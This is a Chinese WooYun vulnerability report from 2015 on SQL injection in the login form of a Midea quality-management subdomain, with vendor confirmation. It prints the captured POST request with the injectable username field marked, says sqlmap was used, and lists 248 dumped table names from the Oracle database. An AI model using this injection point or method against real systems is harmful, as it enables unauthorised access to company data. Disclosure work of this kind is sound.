当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145121

漏洞标题:美的某分站SQL注入漏洞

相关厂商:midea.com

漏洞作者: 路人甲

提交时间:2015-10-07 08:40

修复时间:2015-11-21 19:34

公开时间:2015-11-21 19:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-07: 细节已通知厂商并且等待厂商处理中
2015-10-07: 厂商已经确认,细节仅向厂商公开
2015-10-17: 细节向核心白帽子及相关领域专家公开
2015-10-27: 细节向普通白帽子公开
2015-11-06: 细节向实习白帽子公开
2015-11-21: 细节向公众公开

简要描述:

SQL注入漏洞

详细说明:

初看 http://qms.midea.com.cn/ 登录框没有什么问题,也不想爆破

QQ图片20151007003438.png


但是发现链接 http://qms.midea.com.cn/CE/default.aspx 与上面的系统一样

QQ图片20151007003613.png


很明显,后端数据库类型为:Oracle
登录过程进行抓包

POST /CE/default.aspx HTTP/1.1
Host: qms.midea.com.cn
Proxy-Connection: keep-alive
Content-Length: 250
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://qms.midea.com.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://qms.midea.com.cn/CE/default.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: ASP.NET_SessionId=uc5ues45xgqzgq2zjqk045vm
__VIEWSTATE=%2FwEPDwULLTEyODkwNjgzOTMPZBYCAgMPZBYCAgsPDxYCHgRUZXh0BSfor6XnlKjmiLfkuI3lrZjlnKjmiJbogIXlr4bnoIHplJnor6%2FvvIFkZGTudlv6iFY8jWXoEVrL4hLt%2FZp3Jg%3D%3D&DDL_ZZ=2149&TextBoxUserName=admin*&TextBoxPassword=admin&ButtonLogin=%E7%99%BB+%E5%BD%95


使用sqlmap直接跑数据:

QQ图片20151007003819.jpg


全部数据库名称:

QQ图片20151007003922.jpg


获取当前数据库名称:

QQ图片20151007004026.jpg


列出当前库的全部数据表:

Database: QMSCEADMIN
[248 tables]
+--------------------------------+
| AA |
| BASE_ALLOW_VENDOR_LIST |
| BASE_ERP_TO_QMS_ITEMS |
| BASE_ERP_TO_QMS_VENDORS_INFO |
| CE_IQC_QUOTA_UPDATE |
| CE_OQC_FUNC_REP |
| CE_OQC_SIGNAL |
| CE_OQC_WENSHE |
| CP_UPDATE_APLLYLIST_LOG |
| CTQ_ITEM_MANAGE |
| CTQ_SPECTFICATIONS |
| CTXSYS_DATABASE_USERS |
| CTXSYS_MODULE_DATABASE |
| CTXSYS_SYSTEM_STRUCTURE |
| CTXSYS_SYSTEM_USERNAMEMATCH |
| CTXSYS_SYSTEM_USERS |
| CTX_WORK_FLOW_EMAIL |
| EARLY_PRODUCT_REPORT_QUERY |
| ERP_W_QMS_SCRAP |
| IQC00_ASSORTMENT |
| IQC00_ASSORTMENT_BAK |
| IQC00_BASE_APLLYLIST |
| IQC00_BASE_APLLYLIST_1 |
| IQC00_BASE_MATERIAL_SHOTNAME |
| IQC00_DEFECT_ASSORTMENT |
| IQC01_INSPECT_LPNNUMBER |
| IQC01_INSPECT_MIDEA |
| IQC01_INSPECT_MIDEA01 |
| IQC01_INSPECT_MIDEA01_LOG |
| IQC01_INSPECT_MIDEA_ITEMA |
| IQC01_INSPECT_VENDOR |
| IQC01_INSPECT_VENDOR_ITEMA |
| IQC02_ACRE_MIDEA |
| IQC02_ORIG_INSPECT |
| IQC02_SAMPLESTANDARD |
| IQC02_SWATCHLETTER |
| IQC04_SPEC02_ITEMS |
| IQC_8D_AUDIT_ITEM |
| IQC_8D_CHECK_ITEM |
| IQC_8D_INSPECTION_ITEM |
| IQC_8D_INSPECTION_REPORT |
| IQC_BASE_APLLYLIST_DEL_LOG |
| IQC_CUSTOMER_COMPLAINTS |
| IQC_EAELY_INSPECT_ORIG_M |
| IQC_EARLY_INSPECT |
| IQC_EARLY_INSPECT_LOG |
| IQC_EARLY_RECORD |
| IQC_EXCEPTION_INFORMATION |
| IQC_GYS_WORKFLOW |
| IQC_INSPECTION |
| IQC_INSPECT_ITEM |
| IQC_INSPECT_ITEM_D |
| IQC_INSPECT_MOP_LIST |
| IQC_INSPECT_ORIG_M |
| IQC_INSPECT_ORIG_MOP |
| IQC_INSPECT_ORIG_M_LOG |
| IQC_KEY3_REVIEW_REC |
| IQC_LOSS_RECORD |
| IQC_MAIN_WORKFLOW |
| IQC_MONTH_PLAN |
| IQC_ORT_MONTH_PLAN |
| IQC_ORT_TYPE_RECORD |
| IQC_ORT_TYPE_TEST |
| IQC_PART_BASIS_MESSAGE |
| IQC_PART_BASIS_MESSAGE1 |
| IQC_PART_BASIS_MESSAGE_LOG |
| IQC_PART_MESSAGE_DEL_LOG |
| IQC_PRD10_MATERAIL_REJECT |
| IQC_ROHS_WORKFLOW |
| IQC_SAMPLESHIFT |
| IQC_SCREEN_INSPECTION |
| IQC_SCREEN_LIST |
| IQC_SPECIAL_PROCURE |
| IQC_TEST_MAINTAIN |
| IQC_TEST_REPORT |
| IQC_TEST_REPORT_DROP |
| IQC_TEST_WORKFLOW |
| IQC_TO_SCM_APLLYLIST_LOG |
| IQC_TR_SPECIFICATIONS |
| IQC_TYPE_RECORD |
| IQC_TYPE_TEST |
| IQC_UPDATA_SCM_LOG |
| IQC_VENDOR_MASTER_D |
| IQC_VENDOR_MASTER_M |
| IQC_XINGSHIWEITUO |
| IQC_XS_LIST |
| ITEM_UPDATE_LOG |
| OQC_TRIAL_PRO_INF_TABLES |
| PDM_TO_QMS_CPCECNDRAW_LOG |
| PDM_TO_QMS_CPCECNDRAW_M |
| PQC_BOM_CONTRAST |
| PQC_MATERAIL_REJECT |
| PUB_IQC00_INSPECT_MIDEA |
| QIS7_CAPABILITIES |
| QIS7_CERTIFICATES |
| QIS7_CLMINPUTCHARTS |
| QIS7_DATAEDITORS |
| QIS7_DATAIMIGRATES |
| QIS7_DOEANALYSIS |
| QIS7_EFFECTIVEINDEXES |
| QIS7_INPUTFORMS |
| QIS7_MACHINDATACAPTURE |
| QIS7_MANHATTANS |
| QIS7_MSANALYSIS |
| QIS7_MULTICHARTS |
| QIS7_PARETOCHARTS |
| QIS7_PERFERMANCES |
| QIS7_QUERIES |
| QIS7_REALTIMEINPUT |
| QIS7_REMOTEDATATRANSFER |
| QIS7_SCATTERS |
| QIS7_SCREENMONITOR |
| QIS7_SHEWHARTS |
| QIS7_SPECIALCERTIFICATES |
| QIS7_STATISMONITOR |
| QIS7_SYSMONITORS |
| QIS7_TRANSACTIONMANAGER |
| QIS7_VARIATIONS |
| QIS7_WORKFLOWMANAGER |
| QIS_SYSTEM_AUDITORS |
| QIS_SYSTEM_COMDATAEXPORT |
| QIS_SYSTEM_COMDATAFILTERS |
| QIS_SYSTEM_COMMDATATRANSFER |
| QIS_SYSTEM_COMPARAMETERS |
| QIS_SYSTEM_EMAILSERVERINFOR |
| QIS_SYSTEM_EXCEPTION |
| QIS_SYSTEM_EXCEPTVALUE |
| QIS_SYSTEM_EXTRACTDATA |
| QIS_SYSTEM_IBMMQDEFINITION |
| QIS_SYSTEM_IBMMQINPUTFORMS |
| QIS_SYSTEM_IBMMQMANAGER |
| QIS_SYSTEM_IBMMQMSGRESOLUTION |
| QIS_SYSTEM_IBMMQMSGRESTABLE |
| QIS_SYSTEM_RECSDATAFILTERS |
| QIS_SYSTEM_RECSTRANSFROMDB |
| QIS_SYSTEM_REPORTFILETYPE |
| QIS_SYSTEM_SAPRFCFUNCTIONS |
| QIS_SYSTEM_SAPRFCINTERFACE |
| QIS_SYSTEM_SAPRFCOPERCONFIRM |
| QIS_SYSTEM_SAPRFCPARAMVALUES |
| QIS_SYSTEM_SAPRFCQISOPERATION |
| QIS_SYSTEM_SAPROUTELOG |
| QIS_SYSTEM_SAPSVRINTERFACE |
| QIS_SYSTEM_SAPSVROPERCONFIRM |
| QIS_SYSTEM_SAPSVRPARAMVALUES |
| QIS_SYSTEM_SAPSVRQISOPERATION |
| QIS_SYSTEM_SAPUSERINFOR |
| QIS_SYSTEM_SENDMSGSTRUCTURE |
| QIS_SYSTEM_SENDMSGTEMPLATE |
| QIS_SYSTEM_WORKFLOWSERVERLOG |
| QIS_SYS_ARCHBATCHINTABLE |
| QIS_SYS_ARCHIVEKEYWORDS |
| QIS_SYS_AUTHAGENTNAME |
| QIS_SYS_BACKRECLOGTABLE |
| QIS_SYS_BACKUPDELETERECS |
| QIS_SYS_BARCODEPRINTPRM |
| QIS_SYS_BARCODEPRNPARAMETER |
| QIS_SYS_BARCODESTDPARAMETER |
| QIS_SYS_BAS00_BATCH_NO |
| QIS_SYS_BATCHBINCALLS |
| QIS_SYS_CHARTINPUTPICTURE |
| QIS_SYS_CHARTPOINTTRACE |
| QIS_SYS_CHOICELISTS |
| QIS_SYS_CLMINPUTCHARTS |
| QIS_SYS_COMPONENTTABLE |
| QIS_SYS_COMTRANSACTIONRECOUT |
| QIS_SYS_COMTRANSINPUTFORM |
| QIS_SYS_COMTRANSRELATION |
| QIS_SYS_COMTRANSSRVLOGTABLE |
| QIS_SYS_DBRECSSRVLOGTABLE |
| QIS_SYS_DBWEBSRVLOGTABLE |
| QIS_SYS_DOCUMENTATIONSPECS |
| QIS_SYS_DYNAMICDLLFORMS |
| QIS_SYS_DYNAMICDLLPARAMS |
| QIS_SYS_EMAILADDRESSMANAGER |
| QIS_SYS_EXPERTCOMMENTS |
| QIS_SYS_FLOWTRANSACTIONS |
| QIS_SYS_FORMMODIFICATION |
| QIS_SYS_FORMTABLEVIEW |
| QIS_SYS_GROUPFIELDNAME |
| QIS_SYS_IBMMQSRVLOGTABLE |
| QIS_SYS_IMIGRATEPARAMS |
| QIS_SYS_INDEXKEYS |
| QIS_SYS_LANGUAGETABLE |
| QIS_SYS_LIMITEDUSERTABLE |
| QIS_SYS_LOTUSNOTESINFOR |
| QIS_SYS_MANIPULATEOUTOFRECS |
| QIS_SYS_ONLINEIDLETIME |
| QIS_SYS_ONLINEUSELIST |
| QIS_SYS_POPUPINPUTFORMLIST |
| QIS_SYS_PRODLINEPARAMETER |
| QIS_SYS_PRODLINESTOPCONTROL |
| QIS_SYS_PRODLINESTOPDIRECT |
| QIS_SYS_REALTIMEMONITOR |
| QIS_SYS_RECFILTERCONSTS |
| QIS_SYS_RELATEDFORMVALUE |
| QIS_SYS_RELATEDSPECKEYITEMS |
| QIS_SYS_RS232DATATRANSLOG |
| QIS_SYS_RS232PARAMETERS |
| QIS_SYS_SAPAUTODECISION |
| QIS_SYS_SAPAUTODECISIONLOGO |
| QIS_SYS_SAPCALLWEBSERVICE |
| QIS_SYS_SCREENDISPLAYTEXT |
| QIS_SYS_SHAREDDIRECTORY |
| QIS_SYS_SPECIFICATIONS |
| QIS_SYS_STATISVIEWTABLE |
| QIS_SYS_STATSTRANSACTION |
| QIS_SYS_SUBTEMPLETES |
| QIS_SYS_SYSTEMITEMTABLE |
| QIS_SYS_TABLEDEFINITION |
| QIS_SYS_TABLERELATIONS |
| QIS_SYS_TABLESPECKEYFIELDS |
| QIS_SYS_TECHNICALGUIDES |
| QIS_SYS_TRANSACTIONAGENT |
| QIS_SYS_TRANSACTIONFLOWBACKUP |
| QIS_SYS_TRANSACTIONFLOWMANAGER |
| QIS_SYS_TRANSACTIONFLOWTRASH |
| QIS_SYS_TRANSCYCLETIME |
| QIS_SYS_URLCONFIGURATION |
| QIS_SYS_WEBDATABINDINTERFACE |
| QIS_SYS_WEBDATACERTINTERFACE |
| QIS_SYS_WEBDATAINTABLES |
| QIS_SYS_WEBDATAINTERFACE |
| QIS_SYS_WEBDATAOUTTABLES |
| QIS_SYS_WEBPAGENAMES |
| QIS_SYS_WEBQMSCALLBATCH |
| QIS_SYS_WEBQMSCALLTABLE |
| QIS_SYS_WEBSERVEMETHOD |
| QIS_SYS_WEBSRVCALLDATASET |
| QIS_SYS_WEBSRVCALLMETHOD |
| QIS_SYS_WEBSRVCALLPROPERTY |
| QIS_SYS_WEBSRVCALLTABLE |
| QIS_SYS_WEBSVAPPBATCH |
| QIS_SYS_WEBSVQMSDATASETDEF |
| QIS_SYS_WEBSVQMSDEFINITION |
| QIS_SYS_WORKFLOWTRANSACTIONS |
| QIS_SYS_WORKTRANSFERATION |
| QMS_ORG |
| SCM_PO_CHECK_LOG |
| SRM_TO_QMS_WRITE_BACK |
| SYS_MAIL_LOG |
| SYS_MAIL_TASK |
| T |
| TEST_TABLE |
| TEST_WORD_LIN |
| VENDOR_MATE |
| YLG_ZL_BLL |
| YLG_ZL_KB |
+--------------------------------+


漏洞证明即可,不再深入。

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-10-07 19:32

厂商回复:

感谢乌云最厉害的白帽子@路人甲的提醒,我们召唤应用管理员进行修改。
顺便问一句:路人甲你RANK那么高有什么用...

最新状态:

暂无